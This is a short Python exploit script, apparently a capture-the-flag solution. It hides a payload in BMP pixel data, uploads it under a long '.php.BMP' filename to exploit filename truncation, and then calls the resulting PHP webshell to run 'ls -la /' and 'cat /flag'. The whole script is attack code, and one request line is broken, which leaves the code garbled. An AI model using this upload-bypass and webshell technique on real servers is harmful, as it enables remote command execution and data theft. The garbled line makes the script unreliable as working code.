import requests s = requests.session() LINK = "" # payload = "" payload = "" payload += " "*(3-(len(payload)%3)%3) # Multiple of 3 ! Pad with space chunk = "" PXSIZE = int(len(payload)/3) for i in range(0,len(payload),3): # Chunk BMP : B V R A, B V R A chunk += str(ord(payload[i+2])) # Letter 3 chunk += "," chunk += str(ord(payload[i+1])) # Letter 2 chunk += "," chunk += str(ord(payload[i])) # Letter 1 chunk += ",255," # A px = "0,0,0,255,"*((32*32)-PXSIZE) # PAD for a 32*32 image px = px[:-1] l = chunk+px dico = { "data" : "["+l+"]", "name" : "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php.BMP", # Truncation "format" : "BMP" } r ="save.php",data=dico) # Post payload r = r.text.split("href='")[1].split("'")[0] # Get the uploaded image link webshell = LINK+r print("WebShell at: "+webshell+"?fn=&arg=") r = s.get(webshell+"?fn=system&arg=ls -la /") print(r.text) r = s.get(webshell+"?fn=system&arg=cat /flag") print(r.text) # Congratz. The flag is : NDH{Msp4int.3x3>all>th3g1mp}